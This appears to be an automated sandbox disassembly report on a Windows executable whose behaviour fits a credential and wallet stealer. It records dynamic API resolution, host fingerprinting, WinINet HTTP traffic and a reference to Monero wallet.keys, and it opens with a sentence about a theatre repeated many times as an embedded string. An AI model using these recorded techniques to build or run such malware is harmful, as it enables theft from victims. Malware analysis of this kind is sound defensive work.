                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the 
United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus 
Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 32268c1658f83628b758b84e1a80ca1e62f00fa8c35b8027df971f877c63ea99
                                  • Instruction ID: 3dcc597e6109bf3202e5e5b1ab278527e758719848a7a643285fc2b5b0a1045c
                                  • Opcode Fuzzy Hash: 32268c1658f83628b758b84e1a80ca1e62f00fa8c35b8027df971f877c63ea99
                                  • Instruction Fuzzy Hash: A6410BA57C6714EDCA2CB7AC884DDAD769D5F42F10F50764AA84C762B1CEF05500C739

                                  Control-flow Graph (rendered graph not reproduced in text)
                                  APIs
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E64800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E64889
                                    • Part of subcall function 00E64800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E64899
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • InternetOpenA.WININET(00E80DFF,00000001,00000000,00000000,00000000), ref: 00E66331
                                  • StrCmpCA.SHLWAPI(?,0173E308), ref: 00E66353
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E66385
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0173DAB0,00000000,00000000,00400100,00000000), ref: 00E663D5
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E6640F
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E66421
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E6644D
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E664BD
                                  • InternetCloseHandle.WININET(00000000), ref: 00E6653F
                                  • InternetCloseHandle.WININET(00000000), ref: 00E66549
                                  • InternetCloseHandle.WININET(00000000), ref: 00E66553
                                  Strings
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: cc553bf35b8541e4f4077c7a4d424288f1865e8d5cd97ce85f297105a328d297
                                  • Instruction ID: 8545ac6f73bdc47c42aeb9b697aaf5fd5af4500ec19782b041db1ed5f1031f3e
                                  • Opcode Fuzzy Hash: cc553bf35b8541e4f4077c7a4d424288f1865e8d5cd97ce85f297105a328d297
                                  • Instruction Fuzzy Hash: 7D716E71A50218ABDB24EF90DC59FEEB7B9BB44700F1095A8F10A7B1C4DBB06A84CF51

                                  Control-flow Graph (rendered graph not reproduced in text)
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E776D2
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E7770F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E77793
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E7779A
                                  • wsprintfA.USER32 ref: 00E777D0
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  Strings
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 1544550907-3809124531
                                  • Opcode ID: b0fefc0674baf310f57b611243dafd8d0a8cf667ec83f32476152562b67cc6d5
                                  • Instruction ID: 23ceb615deaa9acbb1bd346e7f976cccbc8f2028616a1626dd01c7b9d6e9e16b
                                  • Opcode Fuzzy Hash: b0fefc0674baf310f57b611243dafd8d0a8cf667ec83f32476152562b67cc6d5
                                  • Instruction Fuzzy Hash: F241C2B1D04348ABDB14DF94DC85BDEBBB8EF08704F1040A9F609BB284D7746A84CBA5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E611B7), ref: 00E77A10
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E77A17
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E77A2F
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 3b7db77f84e10e0c8b178b7034cd5c5961f7988e49990d319fbfa640f039d198
                                  • Instruction ID: 666ab0925eba53e63ddb6c4851c0a0597c821fa7fe9b1908770fb69f40b2b764
                                  • Opcode Fuzzy Hash: 3b7db77f84e10e0c8b178b7034cd5c5961f7988e49990d319fbfa640f039d198
                                  • Instruction Fuzzy Hash: 9FF04FB1D44209EBDB14DF98DD45BAEBBB8EB05B21F10422AF615A2684C7B51540CBA1
                                  APIs
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: fced0f83902ac69a7e3dba37a324d2824c85fce91ae5e31c105741390969d430
                                  • Instruction ID: fa0de84ab2b9f4e3b8ba09cd3ed4ecc388fb1cc95e2c262770495611c9430e68
                                  • Opcode Fuzzy Hash: fced0f83902ac69a7e3dba37a324d2824c85fce91ae5e31c105741390969d430
                                  • Instruction Fuzzy Hash: 6ED05EB590030CABCB14DFE098496DDBB79FB08325F0005A4D91572284EA305495CB65

                                  Control-flow Graph (rendered graph not reproduced in text)
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01725A88), ref: 00E79F3D
                                  • GetProcAddress.KERNEL32(75900000,01725B68), ref: 00E79F55
                                  • GetProcAddress.KERNEL32(75900000,01738F10), ref: 00E79F6E
                                  • GetProcAddress.KERNEL32(75900000,01738F70), ref: 00E79F86
                                  • GetProcAddress.KERNEL32(75900000,0173CD28), ref: 00E79F9E
                                  • GetProcAddress.KERNEL32(75900000,0173CD70), ref: 00E79FB7
                                  • GetProcAddress.KERNEL32(75900000,0172B098), ref: 00E79FCF
                                  • GetProcAddress.KERNEL32(75900000,0173CBF0), ref: 00E79FE7
                                  • GetProcAddress.KERNEL32(75900000,0173CD88), ref: 00E7A000
                                  • GetProcAddress.KERNEL32(75900000,0173CB78), ref: 00E7A018
                                  • GetProcAddress.KERNEL32(75900000,0173CCF8), ref: 00E7A030
                                  • GetProcAddress.KERNEL32(75900000,01725BA8), ref: 00E7A049
                                  • GetProcAddress.KERNEL32(75900000,01725808), ref: 00E7A061
                                  • GetProcAddress.KERNEL32(75900000,017258C8), ref: 00E7A079
                                  • GetProcAddress.KERNEL32(75900000,01725828), ref: 00E7A092
                                  • GetProcAddress.KERNEL32(75900000,0173CC50), ref: 00E7A0AA
                                  • GetProcAddress.KERNEL32(75900000,0173CD10), ref: 00E7A0C2
                                  • GetProcAddress.KERNEL32(75900000,0172B250), ref: 00E7A0DB
                                  • GetProcAddress.KERNEL32(75900000,01725848), ref: 00E7A0F3
                                  • GetProcAddress.KERNEL32(75900000,0173CD40), ref: 00E7A10B
                                  • GetProcAddress.KERNEL32(75900000,0173CDA0), ref: 00E7A124
                                  • GetProcAddress.KERNEL32(75900000,0173CBD8), ref: 00E7A13C
                                  • GetProcAddress.KERNEL32(75900000,0173CAB8), ref: 00E7A154
                                  • GetProcAddress.KERNEL32(75900000,01725868), ref: 00E7A16D
                                  • GetProcAddress.KERNEL32(75900000,0173CB48), ref: 00E7A185
                                  • GetProcAddress.KERNEL32(75900000,0173CC68), ref: 00E7A19D
                                  • GetProcAddress.KERNEL32(75900000,0173CAD0), ref: 00E7A1B6
                                  • GetProcAddress.KERNEL32(75900000,0173CCE0), ref: 00E7A1CE
                                  • GetProcAddress.KERNEL32(75900000,0173CC38), ref: 00E7A1E6
                                  • GetProcAddress.KERNEL32(75900000,0173CC08), ref: 00E7A1FF
                                  • GetProcAddress.KERNEL32(75900000,0173CCC8), ref: 00E7A217
                                  • GetProcAddress.KERNEL32(75900000,0173CC80), ref: 00E7A22F
                                  • GetProcAddress.KERNEL32(75900000,0173CD58), ref: 00E7A248
                                  • GetProcAddress.KERNEL32(75900000,01739F80), ref: 00E7A260
                                  • GetProcAddress.KERNEL32(75900000,0173CAE8), ref: 00E7A278
                                  • GetProcAddress.KERNEL32(75900000,0173CC98), ref: 00E7A291
                                  • GetProcAddress.KERNEL32(75900000,01725888), ref: 00E7A2A9
                                  • GetProcAddress.KERNEL32(75900000,0173CB00), ref: 00E7A2C1
                                  • GetProcAddress.KERNEL32(75900000,017258A8), ref: 00E7A2DA
                                  • GetProcAddress.KERNEL32(75900000,0173CB30), ref: 00E7A2F2
                                  • GetProcAddress.KERNEL32(75900000,0173CB18), ref: 00E7A30A
                                  • GetProcAddress.KERNEL32(75900000,017255C8), ref: 00E7A323
                                  • GetProcAddress.KERNEL32(75900000,017254A8), ref: 00E7A33B
                                  • LoadLibraryA.KERNEL32(0173CBA8,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A34D
                                  • LoadLibraryA.KERNEL32(0173CB60,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A35E
                                  • LoadLibraryA.KERNEL32(0173CCB0,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A370
                                  • LoadLibraryA.KERNEL32(0173CB90,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A382
                                  • LoadLibraryA.KERNEL32(0173CC20,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A393
                                  • LoadLibraryA.KERNEL32(0173CBC0,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A3A5
                                  • LoadLibraryA.KERNEL32(0173CF08,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A3B7
                                  • LoadLibraryA.KERNEL32(0173CF20,?,00E75EF3,00E80AEB,?,?,?,?,?,?,?,?,?,?,00E80AEA,00E80AE7), ref: 00E7A3C8
                                  • GetProcAddress.KERNEL32(75FD0000,017255A8), ref: 00E7A3EA
                                  • GetProcAddress.KERNEL32(75FD0000,0173CF38), ref: 00E7A402
                                  • GetProcAddress.KERNEL32(75FD0000,01738848), ref: 00E7A41A
                                  • GetProcAddress.KERNEL32(75FD0000,0173CE18), ref: 00E7A433
                                  • GetProcAddress.KERNEL32(75FD0000,01725648), ref: 00E7A44B
                                  • GetProcAddress.KERNEL32(734B0000,0172B2C8), ref: 00E7A470
                                  • GetProcAddress.KERNEL32(734B0000,01725468), ref: 00E7A489
                                  • GetProcAddress.KERNEL32(734B0000,0172B188), ref: 00E7A4A1
                                  • GetProcAddress.KERNEL32(734B0000,0173CED8), ref: 00E7A4B9
                                  • GetProcAddress.KERNEL32(734B0000,0173CE30), ref: 00E7A4D2
                                  • GetProcAddress.KERNEL32(734B0000,01725508), ref: 00E7A4EA
                                  • GetProcAddress.KERNEL32(734B0000,017255E8), ref: 00E7A502
                                  • GetProcAddress.KERNEL32(734B0000,0173CDD0), ref: 00E7A51B
                                  • GetProcAddress.KERNEL32(763B0000,01725668), ref: 00E7A53C
                                  • GetProcAddress.KERNEL32(763B0000,01725608), ref: 00E7A554
                                  • GetProcAddress.KERNEL32(763B0000,0173CE48), ref: 00E7A56D
                                  • GetProcAddress.KERNEL32(763B0000,0173CE60), ref: 00E7A585
                                  • GetProcAddress.KERNEL32(763B0000,01725628), ref: 00E7A59D
                                  • GetProcAddress.KERNEL32(750F0000,0172B0E8), ref: 00E7A5C3
                                  • GetProcAddress.KERNEL32(750F0000,0172B138), ref: 00E7A5DB
                                  • GetProcAddress.KERNEL32(750F0000,0173CDE8), ref: 00E7A5F3
                                  • GetProcAddress.KERNEL32(750F0000,01725688), ref: 00E7A60C
                                  • GetProcAddress.KERNEL32(750F0000,017256A8), ref: 00E7A624
                                  • GetProcAddress.KERNEL32(750F0000,0172B1B0), ref: 00E7A63C
                                  • GetProcAddress.KERNEL32(75A50000,0173CE90), ref: 00E7A662
                                  • GetProcAddress.KERNEL32(75A50000,01725708), ref: 00E7A67A
                                  • GetProcAddress.KERNEL32(75A50000,01738978), ref: 00E7A692
                                  • GetProcAddress.KERNEL32(75A50000,0173CE00), ref: 00E7A6AB
                                  • GetProcAddress.KERNEL32(75A50000,0173CE78), ref: 00E7A6C3
                                  • GetProcAddress.KERNEL32(75A50000,01725728), ref: 00E7A6DB
                                  • GetProcAddress.KERNEL32(75A50000,017257C8), ref: 00E7A6F4
                                  • GetProcAddress.KERNEL32(75A50000,0173CEF0), ref: 00E7A70C
                                  • GetProcAddress.KERNEL32(75A50000,0173CEA8), ref: 00E7A724
                                  • GetProcAddress.KERNEL32(75070000,01725408), ref: 00E7A746
                                  • GetProcAddress.KERNEL32(75070000,0173CEC0), ref: 00E7A75E
                                  • GetProcAddress.KERNEL32(75070000,0173CF50), ref: 00E7A776
                                  • GetProcAddress.KERNEL32(75070000,0173CF68), ref: 00E7A78F
                                  • GetProcAddress.KERNEL32(75070000,0173CDB8), ref: 00E7A7A7
                                  • GetProcAddress.KERNEL32(74E50000,01725568), ref: 00E7A7C8
                                  • GetProcAddress.KERNEL32(74E50000,01725748), ref: 00E7A7E1
                                  • GetProcAddress.KERNEL32(75320000,017254E8), ref: 00E7A802
                                  • GetProcAddress.KERNEL32(75320000,0173CA58), ref: 00E7A81A
                                  • GetProcAddress.KERNEL32(6F060000,017256C8), ref: 00E7A840
                                  • GetProcAddress.KERNEL32(6F060000,01725528), ref: 00E7A858
                                  • GetProcAddress.KERNEL32(6F060000,01725588), ref: 00E7A870
                                  • GetProcAddress.KERNEL32(6F060000,0173C9B0), ref: 00E7A889
                                  • GetProcAddress.KERNEL32(6F060000,01725768), ref: 00E7A8A1
                                  • GetProcAddress.KERNEL32(6F060000,017256E8), ref: 00E7A8B9
                                  • GetProcAddress.KERNEL32(6F060000,01725788), ref: 00E7A8D2
                                  • GetProcAddress.KERNEL32(6F060000,017257A8), ref: 00E7A8EA
                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00E7A901
                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00E7A917
                                  • GetProcAddress.KERNEL32(74E00000,0173C800), ref: 00E7A939
                                  • GetProcAddress.KERNEL32(74E00000,01738808), ref: 00E7A951
                                  • GetProcAddress.KERNEL32(74E00000,0173C8C0), ref: 00E7A969
                                  • GetProcAddress.KERNEL32(74E00000,0173C890), ref: 00E7A982
                                  • GetProcAddress.KERNEL32(74DF0000,017257E8), ref: 00E7A9A3
                                  • GetProcAddress.KERNEL32(6F9B0000,0173CA28), ref: 00E7A9C4
                                  • GetProcAddress.KERNEL32(6F9B0000,01725428), ref: 00E7A9DD
                                  • GetProcAddress.KERNEL32(6F9B0000,0173C7B8), ref: 00E7A9F5
                                  • GetProcAddress.KERNEL32(6F9B0000,0173C818), ref: 00E7AA0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 6da48b25ee8b7ad32c14d030f3646780475ce42c9fd57d5184a9a44f9c05a853
                                  • Instruction ID: f3b056c675edeb2f9f3d8d4a99a62d87ac01f5429b19a973c4ddc7ca2faf1020
                                  • Opcode Fuzzy Hash: 6da48b25ee8b7ad32c14d030f3646780475ce42c9fd57d5184a9a44f9c05a853
                                  • Instruction Fuzzy Hash: 80621EF6510200AFC36CDFA8E9889567BFAA74D7013108A3AF929C369CD73599C0DF60

                                  Control-flow Graph

                                  control_flow_graph 801 e648d0-e64992 call e7aab0 call e64800 call e7aa50 * 5 InternetOpenA StrCmpCA 816 e64994 801->816 817 e6499b-e6499f 801->817 816->817 818 e649a5-e64b1d call e78cf0 call e7ac30 call e7abb0 call e7ab10 * 2 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7ac30 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7ac30 call e7abb0 call e7ab10 * 2 InternetConnectA 817->818 819 e64f1b-e64f43 InternetCloseHandle call e7ade0 call e6a210 817->819 818->819 905 e64b23-e64b27 818->905 829 e64f45-e64f7d call e7ab30 call e7acc0 call e7abb0 call e7ab10 819->829 830 e64f82-e64ff2 call e78b20 * 2 call e7aab0 call e7ab10 * 8 819->830 829->830 906 e64b35 905->906 907 e64b29-e64b33 905->907 908 e64b3f-e64b72 HttpOpenRequestA 906->908 907->908 909 e64f0e-e64f15 InternetCloseHandle 908->909 910 e64b78-e64e78 call e7acc0 call e7abb0 call e7ab10 call e7ac30 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7ac30 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7ac30 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7acc0 call e7abb0 call e7ab10 call e7ac30 call e7abb0 call e7ab10 call e7aa50 call e7ac30 * 2 call e7abb0 call e7ab10 * 2 call e7ade0 lstrlen call e7ade0 * 2 lstrlen call e7ade0 HttpSendRequestA 908->910 909->819 1021 e64e82-e64eac InternetReadFile 910->1021 1022 e64eb7-e64f09 InternetCloseHandle call e7ab10 1021->1022 1023 e64eae-e64eb5 1021->1023 1022->909 1023->1022 1024 e64eb9-e64ef7 call e7acc0 call e7abb0 call e7ab10 1023->1024 1024->1021
                                  APIs
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E64800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E64889
                                    • Part of subcall function 00E64800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E64899
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E64965
                                  • StrCmpCA.SHLWAPI(?,0173E308), ref: 00E6498A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E64B0A
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E80DDE,00000000,?,?,00000000,?,",00000000,?,0173E398), ref: 00E64E38
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E64E54
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E64E68
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E64E99
                                  • InternetCloseHandle.WININET(00000000), ref: 00E64EFD
                                  • InternetCloseHandle.WININET(00000000), ref: 00E64F15
                                  • HttpOpenRequestA.WININET(00000000,0173E348,?,0173DAB0,00000000,00000000,00400100,00000000), ref: 00E64B65
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • InternetCloseHandle.WININET(00000000), ref: 00E64F1F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: e09e64f4ca57072fad7d2317e44753228d86435ba757d632192a9d2538f7a507
                                  • Instruction ID: 32bcba3fb986b49683746d0feb57b33a550b0f8b582577f9823feaa2de871c6c
                                  • Opcode Fuzzy Hash: e09e64f4ca57072fad7d2317e44753228d86435ba757d632192a9d2538f7a507
                                  • Instruction Fuzzy Hash: 8F12BD72910118ABDB19EB90DD62FEEB3B9AF54300F5495A9F10A72091DF706F48CF62

                                  Control-flow Graph

                                  control_flow_graph 1090 e75760-e757c7 call e75d20 call e7ab30 * 3 call e7aa50 * 4 1106 e757cc-e757d3 1090->1106 1107 e75827-e7589c call e7aa50 * 2 call e61590 call e75510 call e7abb0 call e7ab10 call e7ade0 StrCmpCA 1106->1107 1108 e757d5-e75806 call e7ab30 call e7aab0 call e61590 call e75440 1106->1108 1134 e758e3-e758f9 call e7ade0 StrCmpCA 1107->1134 1138 e7589e-e758de call e7aab0 call e61590 call e75440 call e7abb0 call e7ab10 1107->1138 1124 e7580b-e75822 call e7abb0 call e7ab10 1108->1124 1124->1134 1139 e758ff-e75906 1134->1139 1140 e75a2c-e75a94 call e7abb0 call e7ab30 * 2 call e616b0 call e7ab10 * 4 call e61670 call e61550 1134->1140 1138->1134 1142 e7590c-e75913 1139->1142 1143 e75a2a-e75aaf call e7ade0 StrCmpCA 1139->1143 1269 e75d13-e75d16 1140->1269 1147 e75915-e75969 call e7ab30 call e7aab0 call e61590 call e75440 call e7abb0 call e7ab10 1142->1147 1148 e7596e-e759e3 call e7aa50 * 2 call e61590 call e75510 call e7abb0 call e7ab10 call e7ade0 StrCmpCA 1142->1148 1162 e75ab5-e75abc 1143->1162 1163 e75be1-e75c49 call e7abb0 call e7ab30 * 2 call e616b0 call e7ab10 * 4 call e61670 call e61550 1143->1163 1147->1143 1148->1143 1246 e759e5-e75a25 call e7aab0 call e61590 call e75440 call e7abb0 call e7ab10 1148->1246 1169 e75ac2-e75ac9 1162->1169 1170 e75bdf-e75c64 call e7ade0 StrCmpCA 1162->1170 1163->1269 1177 e75b23-e75b98 call e7aa50 * 2 call e61590 call e75510 call e7abb0 call e7ab10 call e7ade0 StrCmpCA 1169->1177 1178 e75acb-e75b1e call e7ab30 call e7aab0 call e61590 call e75440 call e7abb0 